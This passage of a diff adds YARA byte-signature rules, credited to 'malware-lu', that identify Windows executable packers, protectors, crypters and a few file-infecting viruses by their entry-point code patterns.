+		$a0 = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv036alphaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { AB E2 E5 5D 59 8B 76 68 51 59 46 AD 85 C0 }
+
+condition:
+		$a0
+}
+	
+	
+rule CrinklerV03V04RuneLHStubbeandAskeSimonChristensen
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 00 00 42 00 31 DB 43 EB 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DingBoysPElockPhantasmv10v11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 57 56 52 51 53 66 81 C3 EB 02 EB FC 66 81 C3 EB 02 EB FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactV2XBitsumTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CRYPTVersion17cDismember
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0E 17 9C 58 F6 ?? ?? 74 ?? E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxXPEH4768
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5B 81 ?? ?? ?? 50 56 57 2E ?? ?? ?? ?? ?? 2E ?? ?? ?? ?? ?? ?? B8 01 00 50 B8 ?? ?? 50 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECrypt32v102
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5B 83 ?? ?? EB ?? 52 4E 44 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PESHiELD025Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 2B 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 CC CC E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NETDLLMicrosoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 5F 43 6F 72 44 6C 6C 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00 00 ?? 00 00 FF 25 }
+
+condition:
+		$a0
+}
+	
+	
+rule MSLRH
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 3D FF 0F 00 00 EB 01 68 EB 02 CD 20 EB 01 E8 76 1B EB 01 68 EB 02 CD 20 EB 01 E8 CC 66 B8 FE 00 74 04 75 02 EB 02 EB 01 81 66 E7 64 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BeRoEXEPackerv100DLLLZMABeRoFarbrausch
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B F9 81 FE ?? ?? ?? ?? 7F 10 AC 47 04 18 2C 02 73 F0 29 3E 03 F1 03 F9 EB E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02ExeSmasherAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C FE 03 90 60 BE 90 90 41 90 8D BE 90 10 FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 FE 0B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV125ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv107bDLLAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MicroJoiner17coban2k
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF 00 10 40 00 8D 5F 21 6A 0A 58 6A 04 59 60 57 E8 8E 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeVOBProtectCDFEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 5F 81 EF 00 00 00 00 BE 00 00 40 00 8B 87 00 00 00 00 03 C6 57 56 8C A7 00 00 00 00 FF 10 89 87 00 00 00 00 5E 5F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CelsiusCrypt21Z3r0
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 84 92 44 00 E8 C8 FE FF FF 90 8D B4 26 00 00 00 00 55 89 E5 83 EC 08 C7 04 24 02 00 00 00 FF 15 84 92 44 00 E8 A8 FE FF FF 90 8D B4 26 00 00 00 00 55 8B 0D C4 92 44 00 89 E5 5D FF E1 8D 74 26 00 55 8B 0D AC 92 44 00 89 E5 5D FF E1 90 90 90 90 55 89 E5 5D E9 77 C2 00 00 90 90 90 90 90 90 90 55 89 E5 83 EC 28 8B 45 10 89 04 24 E8 3F 14 01 00 48 89 45 FC 8B 45 0C 48 89 45 F4 8D 45 F4 89 44 24 04 8D 45 FC 89 04 24 E8 12 A3 03 00 8B 00 89 45 F8 8B 45 FC 89 45 F0 C6 45 EF 01 C7 45 E8 00 00 00 00 8B 45 E8 3B 45 F8 73 39 80 7D EF 00 74 33 8B 45 F0 89 44 24 04 8B 45 10 89 04 24 E8 1C 1A 01 00 89 C1 8B 45 08 8B 55 E8 01 C2 0F B6 01 3A 02 0F 94 C0 88 45 EF 8D 45 F0 FF 08 8D 45 E8 FF 00 EB BF 83 7D F0 00 74 34 80 7D EF 00 74 2E 8B 45 F0 89 44 24 04 8B 45 10 89 04 24 E8 DD 19 01 00 89 C1 8B 45 08 8B 55 F8 01 C2 0F B6 01 3A 02 0F 94 C0 88 45 EF 8D 45 F0 FF 08 EB C6 C7 44 24 04 00 00 00 00 8B 45 10 89 04 24 E8 AE 19 01 00 89 C1 8B 45 08 8B 55 F8 01 C2 0F B6 01 3A 02 7F 0C 0F B6 45 EF 83 E0 01 88 45 E7 EB 04 C6 45 E7 00 0F B6 45 E7 88 45 EF 0F B6 45 EF C9 C3 }
+	$a1 = { 55 89 E5 83 EC 28 8B 45 10 89 04 24 E8 3F 14 01 00 48 89 45 FC 8B 45 0C 48 89 45 F4 8D 45 F4 89 44 24 04 8D 45 FC 89 04 24 E8 12 A3 03 00 8B 00 89 45 F8 8B 45 FC 89 45 F0 C6 45 EF 01 C7 45 E8 00 00 00 00 8B 45 E8 3B 45 F8 73 39 80 7D EF 00 74 33 8B 45 F0 89 44 24 04 8B 45 10 89 04 24 E8 1C 1A 01 00 89 C1 8B 45 08 8B 55 E8 01 C2 0F B6 01 3A 02 0F 94 C0 88 45 EF 8D 45 F0 FF 08 8D 45 E8 FF 00 EB BF 83 7D F0 00 74 34 80 7D EF 00 74 2E 8B 45 F0 89 44 24 04 8B 45 10 89 04 24 E8 DD 19 01 00 89 C1 8B 45 08 8B 55 F8 01 C2 0F B6 01 3A 02 0F 94 C0 88 45 EF 8D 45 F0 FF 08 EB C6 C7 44 24 04 00 00 00 00 8B 45 10 89 04 24 E8 AE 19 01 00 89 C1 8B 45 08 8B 55 F8 01 C2 0F B6 01 3A 02 7F 0C 0F B6 45 EF 83 E0 01 88 45 E7 EB 04 C6 45 E7 00 0F B6 45 E7 88 45 EF 0F B6 45 EF C9 C3 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule Armadillov260
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 D0 ?? ?? ?? 68 34 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 68 ?? ?? ?? 33 D2 8A D4 89 15 84 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov261
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 28 ?? ?? ?? 68 E4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 0C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeASPack212emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RatPackerGluestub
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 40 20 FF 00 00 00 00 00 00 00 ?? BE 00 60 40 00 8D BE 00 B0 FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CreateInstallv200335
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 81 EC 0C 04 00 00 53 56 57 55 68 60 50 40 00 6A 01 6A 00 FF 15 D8 80 40 00 8B F0 FF 15 D4 80 40 00 3D B7 00 00 00 75 0F 56 FF 15 B8 80 40 00 6A 02 FF 15 A4 80 40 00 33 DB E8 F2 FE FF FF 68 02 7F 00 00 89 1D 94 74 40 00 53 89 1D 98 74 40 00 FF 15 E4 80 40 }
+
+condition:
+		$a0
+}
+	
+	
+rule SPECb3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5B 53 50 45 43 5D E8 ?? ?? ?? ?? 5D 8B C5 81 ED 41 24 40 ?? 2B 85 89 26 40 ?? 83 E8 0B 89 85 8D 26 40 ?? 0F B6 B5 91 26 40 ?? 8B FD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SPECb2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 57 51 53 E8 ?? ?? ?? ?? 5D 8B C5 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 09 89 85 ?? ?? ?? ?? 0F B6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXV200V290MarkusOberhumerLaszloMolnarJohnReiser
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01MicrosoftVisualBasic5060Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? E8 0A 00 00 00 00 00 00 00 00 00 30 00 00 00 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXModifiedStubbFarbrauschConsumerConsulting
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule E2CbyDoP
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? BF ?? ?? B9 ?? ?? FC 57 F3 A5 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SVKProtectorv111
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED 06 ?? ?? ?? 64 A0 23 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCShrinkerv071
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 BD ?? ?? ?? ?? 01 AD 54 3A 40 ?? FF B5 50 3A 40 ?? 6A 40 FF 95 88 3A 40 ?? 50 50 2D ?? ?? ?? ?? 89 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petite21
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 }
+
+condition:
+		$a0
+}
+	
+	
+rule BeRoEXEPackerv100DLLLZBRRBeRoFarbrausch
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 BE ?? ?? ?? ?? BF ?? ?? ?? ?? FC B2 80 33 DB A4 B3 02 E8 ?? ?? ?? ?? 73 F6 33 C9 E8 ?? ?? ?? ?? 73 1C 33 C0 E8 ?? ?? ?? ?? 73 23 B3 02 41 B0 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule hmimysPackerV12hmimys
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 95 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 5E AD 50 AD 50 97 AD 50 AD 50 AD 50 E8 C0 01 00 00 AD 50 AD 93 87 DE B9 ?? ?? ?? ?? E3 1D 8A 07 47 04 ?? 3C ?? 73 F7 8B 07 3C ?? 75 F3 B0 00 0F C8 05 ?? ?? ?? ?? 2B C7 AB E2 E3 AD 85 C0 74 2B 97 56 FF 13 8B E8 AC 84 C0 75 FB 66 AD 66 85 C0 74 E9 AC 83 EE 03 84 C0 74 08 56 55 FF 53 04 AB EB E4 AD 50 55 FF 53 04 AB EB E0 C3 8B 0A 3B 4A 04 75 0A C7 42 10 01 00 00 00 0C FF C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EnigmaProtector131Build20070615DllSukhovVladimirSergeNMarkin
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 81 ED ?? ?? ?? ?? E9 49 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8A 84 24 28 00 00 00 80 F8 01 0F 84 07 00 00 00 B8 ?? ?? ?? ?? FF E0 E9 04 00 00 00 ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 81 C0 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 30 10 40 49 0F 85 F6 FF FF FF E9 04 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PureBasicDLLNeilHodgson
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 7C 24 08 01 75 ?? 8B 44 24 04 A3 ?? ?? ?? 10 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HPA
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 8B D6 83 ?? ?? 83 ?? ?? 06 0E 1E 0E 1F 33 FF 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov310
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 E0 97 44 00 68 20 C0 42 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 4C 41 44 00 33 D2 8A D4 89 15 90 A1 44 00 8B C8 81 E1 FF 00 00 00 89 0D 8C A1 44 00 C1 E1 08 03 CA 89 0D 88 A1 44 00 C1 E8 10 A3 84 A1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upack012betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 48 01 40 00 AD ?? ?? ?? A5 ?? C0 33 C9 ?? ?? ?? ?? ?? ?? ?? F3 AB ?? ?? 0A ?? ?? ?? ?? AD 50 97 51 ?? 87 F5 58 8D 54 86 5C ?? D5 72 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B6 5F FF C1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxNcuLi1688
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0E 1E B8 55 AA CD 21 3D 49 4C 74 ?? 0E 0E 1F 07 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtectorvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 00 47 44 49 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 53 6C 65 65 70 00 00 00 47 65 74 56 65 72 73 69 6F 6E 00 00 00 47 65 74 43 6F 6D 6D 61 6E 64 4C 69 6E 65 41 00 00 00 47 65 74 53 74 61 72 74 75 70 49 6E 66 6F 41 00 00 00 47 65 74 41 43 50 00 00 00 43 72 65 61 74 65 54 68 72 65 61 64 00 00 00 44 65 66 57 69 6E 64 6F 77 50 72 6F 63 41 00 00 00 52 65 67 69 73 74 65 72 43 6C 61 73 73 45 78 41 00 00 00 43 72 65 61 74 65 57 69 6E 64 6F 77 45 78 41 00 00 00 47 65 74 53 79 73 74 65 6D 4D 65 74 72 69 63 73 00 00 00 53 68 6F 77 57 69 6E 64 6F 77 00 00 00 47 65 74 44 43 00 00 00 52 65 6C 65 61 73 65 44 43 00 00 00 46 69 6E 64 57 69 6E 64 6F 77 41 00 00 00 47 65 74 4D 65 73 73 61 67 65 41 00 00 00 44 65 73 74 72 6F 79 57 69 6E 64 6F 77 00 00 00 53 65 74 50 69 78 65 6C }
+	$a1 = { 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 00 47 44 49 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 53 6C 65 65 70 00 00 00 47 65 74 56 65 72 73 69 6F 6E 00 00 00 47 65 74 43 6F 6D 6D 61 6E 64 4C 69 6E 65 41 00 00 00 47 65 74 53 74 61 72 74 75 70 49 6E 66 6F 41 00 00 00 47 65 74 41 43 50 00 00 00 43 72 65 61 74 65 54 68 72 65 61 64 00 00 00 44 65 66 57 69 6E 64 6F 77 50 72 6F 63 41 00 00 00 52 65 67 69 73 74 65 72 43 6C 61 73 73 45 78 41 00 00 00 43 72 65 61 74 65 57 69 6E 64 6F 77 45 78 41 00 00 00 47 65 74 53 79 73 74 65 6D 4D 65 74 72 69 63 73 00 00 00 53 68 6F 77 57 69 6E 64 6F 77 00 00 00 47 65 74 44 43 00 00 00 52 65 6C 65 61 73 65 44 43 00 00 00 46 69 6E 64 57 69 6E 64 6F 77 41 00 00 00 47 65 74 4D 65 73 73 61 67 65 41 00 00 00 44 65 73 74 72 6F 79 57 69 6E 64 6F 77 00 00 00 53 65 74 50 69 78 65 6C 00 00 00 00 }
+	$a2 = { 00 00 00 00 55 73 65 72 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 64 69 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 44 65 66 57 69 6E 64 6F 77 50 72 6F 63 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 52 65 67 69 73 74 65 72 43 6C 61 73 73 45 78 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 43 72 65 61 74 65 57 69 6E 64 6F 77 45 78 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 47 65 74 53 79 73 74 65 6D 4D 65 74 72 69 63 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 53 68 6F 77 57 69 6E 64 6F 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 47 65 74 44 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 52 65 6C 65 61 73 65 44 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 46 69 6E 64 57 69 6E 64 6F 77 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 65 74 4D 65 73 73 61 67 65 41 00 }
+
+condition:
+		$a0 or $a1 or $a2
+}
+	
+	
+rule XPackv142
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 72 ?? C3 8B DE 83 ?? ?? C1 ?? ?? 8C D8 03 C3 8E D8 8B DF 83 ?? ?? C1 ?? ?? 8C C0 03 C3 8E C0 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule W32JeefoPEFileInfector
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 83 C4 F4 6A 02 A1 C8 ?? ?? ?? FF D0 E8 ?? ?? ?? ?? C9 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeSplitter13SplitCryptMethodBillPrisonerTPOC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 15 10 05 23 14 56 57 57 48 12 0B 16 66 66 66 66 66 66 66 66 66 02 C7 56 66 66 66 ED 26 6A ED 26 6A ED 66 E3 A6 69 E2 39 64 66 66 ED 2E 56 E6 5F 0D 12 61 E6 5F 2D 12 64 8D 81 E6 1F 6A 55 12 64 8D B9 ED 26 7E A5 33 ED 8A 8D 69 21 03 12 36 14 09 05 27 02 02 14 03 15 15 27 ED 2B 6A ED 13 6E ED B8 65 10 5A EB 10 7E EB 10 06 ED 50 65 95 30 ED 10 46 65 95 55 B4 ED A0 ED 50 65 95 37 ED 2B 6A EB DF AB 76 26 66 3F DF 68 66 66 66 9A 95 C0 6D AF 13 64 }
+	$a1 = { E8 00 00 00 00 5D 81 ED 05 10 40 00 B9 ?? ?? ?? ?? 8D 85 1D 10 40 00 80 30 66 40 E2 FA 8F 98 67 66 66 ?? ?? ?? ?? ?? ?? ?? 66 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule AntiDote12BetaDemoSISTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 69 D6 00 00 E8 C6 FD FF FF 68 69 D6 00 00 E8 BC FD FF FF 83 C4 08 E8 A4 FF FF FF 84 C0 74 2F 68 04 01 00 00 68 B0 21 60 00 6A 00 FF 15 08 10 60 00 E8 29 FF FF FF 50 68 88 10 60 00 68 78 10 60 00 68 B0 21 60 00 E8 A4 FD FF FF 83 C4 10 33 C0 C2 10 00 90 90 90 90 90 90 90 90 90 90 90 90 8B 4C 24 08 56 8B 74 24 08 33 D2 8B C6 F7 F1 8B C6 85 D2 74 08 33 D2 F7 F1 40 0F AF C1 5E C3 90 8B 44 24 04 53 55 56 8B 48 3C 57 03 C8 33 D2 8B 79 54 8B 71 38 8B C7 F7 F6 85 D2 74 0C 8B C7 33 D2 F7 F6 8B F8 47 0F AF FE 33 C0 33 DB 66 8B 41 14 8D 54 08 18 33 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv211bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 3D 04 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor224StrongbitSoftCompleteDevelopmenth1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 F7 FE FF FF 05 ?? ?? 00 00 FF E0 E8 EB FE FF FF 05 ?? ?? 00 00 FF E0 E8 04 00 00 00 FF FF FF FF 5E C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor224StrongbitSoftCompleteDevelopmenth2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 F7 FE FF FF 05 ?? ?? 00 00 FF E0 E8 EB FE FF FF 05 ?? ?? 00 00 FF E0 E8 ?? 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor224StrongbitSoftCompleteDevelopmenth3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
+
+condition:
+		$a0
+}
+	
+	
+rule ProActivateV10XTurboPowerSoftwareCompany
+{
+      meta:
+		author="malware-lu"
+strings:
